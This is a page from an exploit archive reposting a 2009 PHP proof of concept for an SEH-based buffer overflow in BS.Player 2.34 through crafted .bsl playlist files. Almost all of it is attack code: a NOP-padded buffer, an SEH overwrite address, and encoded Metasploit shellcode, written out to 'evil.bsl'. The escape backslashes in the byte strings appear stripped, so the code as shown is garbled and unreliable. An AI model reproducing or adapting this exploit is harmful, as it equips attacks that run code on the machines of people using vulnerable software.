BS.Player <= 2.34 Build 980 (.bsl) Local Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BS.Player <= 2.34 Build 980 (.bsl) Local Buffer Overflow Exploit (SEH)
# Published : 2009-03-20
# Author : Nine:Situations:Group
# Previous Title : CloneCD/DVD (ElbyCDIO.sys < 6.0.3.2) Local Privilege Escalation Exploit
# Next Title : BS.Player 2.34 (.bsl) Universal SEH Overwrite Exploit

<?php
/*
Bs.Player <= 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh)
by Nine:Situations:Group::pyrokinesis

Overlong hostnames in bsplayer playlist files causes eax and seh handlers to be
overwritten. Cannot reliably debug with olly because of code compression, just
used faultmon/memdump/msfpescan and I choosed the easy/universal way with seh.
There are some pop ret addresses in common among the vulnerable versions...

Well it says local but I consider it a remote one because .bsl files are
associated to the program
Tested and working against:

...
v2.32 Build 975 Free
v2.34 Build 980 PRO
win xp pro sp2 / sp3
win 2k3 sp1

not vulnerable:
v2.35 Build 985 PRO
V2.36 Build 990 Free/Pro


*/
$buffer=
"x23x45x58x54x4dx33x55x0dx0ax23x45x58x54x49x4ex46".
"x3ax30x2cx41x41x41x41x0dx0ax68x74x74x70x3ax2fx2f".
"x52x61x77x2dx48x69x67x68x2e";

$nop1=str_repeat("x90",384);
$eax_again="BBBB";
$nop2=str_repeat("x90",12);
$eax="CCCC";
$nop3=str_repeat("x90",8);
$jnk=$nop1.$eax_again.$nop2.$eax.$nop3;

$jmp="xebx08x90x90";

$seh="xb1xadx41x00"; //0x0041adb1   pop pop ret bsplayer.exe

$nop4=str_repeat("x90",100);

// win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
$scode=
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49".
"x49x49x49x49x49x49x49x49x49x37x49x49x51x5ax6ax47".
"x58x50x30x42x31x41x42x6bx42x41x57x32x42x42x42x32".
"x41x41x30x41x41x58x38x42x42x50x75x59x79x4bx4cx69".
"x78x37x34x67x70x45x50x75x50x6cx4bx61x55x45x6cx6e".
"x6bx71x6cx73x35x62x58x66x61x6ax4fx4cx4bx42x6fx56".
"x78x4cx4bx71x4fx77x50x57x71x6ax4bx72x69x6ex6bx75".
"x64x4ex6bx75x51x68x6ex30x31x59x50x4dx49x4cx6cx4f".
"x74x69x50x31x64x36x67x4fx31x4ax6ax44x4dx75x51x68".
"x42x38x6bx5ax54x35x6bx62x74x75x74x37x74x70x75x68".
"x65x4cx4bx51x4fx35x74x73x31x4ax4bx50x66x6cx4bx44".
"x4cx50x4bx6cx4bx41x4fx77x6cx34x41x7ax4bx6cx4bx67".
"x6cx6ex6bx37x71x6ax4bx4dx59x33x6cx71x34x54x44x39".
"x53x55x61x6fx30x41x74x6cx4bx37x30x70x30x6ex65x4b".
"x70x61x68x66x6cx6ex6bx61x50x36x6cx6ex6bx74x30x65".
"x4cx6ex4dx6cx4bx71x78x64x48x68x6bx76x69x6cx4bx4f".
"x70x48x30x75x50x75x50x55x50x4ex6bx63x58x67x4cx31".
"x4fx56x51x4ax56x53x50x41x46x4fx79x4bx48x4bx33x39".
"x50x61x6bx32x70x53x58x6cx30x4cx4ax65x54x53x6fx63".
"x58x7ax38x49x6ex4ex6ax54x4ex70x57x69x6fx58x67x62".
"x43x72x41x70x6cx70x63x43x30x47";

$buffer.=$jnk.$jmp.$seh.$nop4.$scode;
$buffer.=
"x56x37x2ex46x4dx2fx6cx69x73x74x65x6ex2ex70".
"x6cx73x0dx0ax00";

$fp=fopen("evil.bsl","w+");
if (!$fp) {die("cannot create evil.bsl!");}
@fputs($fp,$buffer);
@fclose($fp);
?>

# www.Syue.com [2009-03-20]